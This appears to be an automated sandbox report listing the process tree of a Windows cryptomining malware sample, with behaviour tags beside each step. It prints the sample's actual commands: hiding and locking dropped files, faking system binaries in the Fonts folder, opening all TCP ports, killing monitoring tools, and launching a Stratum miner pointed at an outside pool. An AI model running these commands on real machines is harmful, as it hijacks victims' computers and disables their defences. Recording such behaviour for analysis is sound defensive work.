[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\srvany.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\splwow64.exe /d everyone
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\Windows\svchost.exe
- Sets file to hidden
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\svchost.exe /d everyone
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\taskkill.exe -> taskkill /f /t /im tasksche.exe
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\attrib.exe -> attrib +s +h +r C:\Windows\tasksche.exe
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\tasksche.exe /d everyone
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\help\csrss.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
[depth 3] C:\Windows\SysWOW64\cacls.exe -> cacls C:\windows\help\www.exe /p everyone:n /d system
[depth 3] C:\Windows\SysWOW64\sc.exe -> sc config MpsSvc start= auto
- Launches sc.exe
[depth 3] C:\Windows\SysWOW64\net.exe -> net start MpsSvc
[depth 4] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 start MpsSvc
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh advfirewall set allprofiles state on
- Modifies Windows Firewall
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
- Modifies Windows Firewall
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
- Modifies Windows Firewall
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
- Modifies Windows Firewall
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add policy name=win
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filterlist name=Allowlist
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filterlist name=denylist
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filteraction name=Allow action=permit
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add filteraction name=deny action=block
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
[depth 3] C:\Windows\SysWOW64\netsh.exe -> netsh ipsec static set policy name=win assign=y
[depth 3] C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" ver "
[depth 3] C:\Windows\SysWOW64\find.exe -> find "5.1."
[depth 2] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.
- Executes dropped EXE
[depth 2] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe
- Executes dropped EXE
[depth 2] C:\Windows\SysWOW64\net.exe -> net stop RpcEptManger
[depth 2] C:\Windows\SysWOW64\sc.exe -> sc delete FormManger
- Launches sc.exe
[depth 2] C:\Windows\SysWOW64\net.exe -> net stop FormManger
[depth 2] C:\Windows\SysWOW64\WScript.exe -> "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
[depth 1] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop FormManger
[depth 1] C:\Windows\SysWOW64\net1.exe -> C:\Windows\system32\net1 stop RpcEptManger
[depth 1] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe
- Executes dropped EXE
[depth 2] \??\c:\windows\Fonts\lsass.exe -> "c:\windows\Fonts\lsass.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im ProcessHacker.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im ProcessHacker.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im procexp.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im procexp.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im perfmon.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im perfmon.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im autoruns.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im autoruns.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im rundll32.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im rundll32.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c taskkill /im taskmgr.exe /f /T
[depth 4] C:\Windows\SysWOW64\taskkill.exe -> taskkill /im taskmgr.exe /f /T
- Kills process with taskkill
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib -s -h -r -a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe start Hostserver
- Executes dropped EXE
[depth 3] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
- Executes dropped EXE
[depth 3] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
- Executes dropped EXE
[depth 3] \??\c:\windows\Fonts\svchost.exe -> c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
- Detected Stratum cryptominer command
- Executes dropped EXE
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib -s -h -r -a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
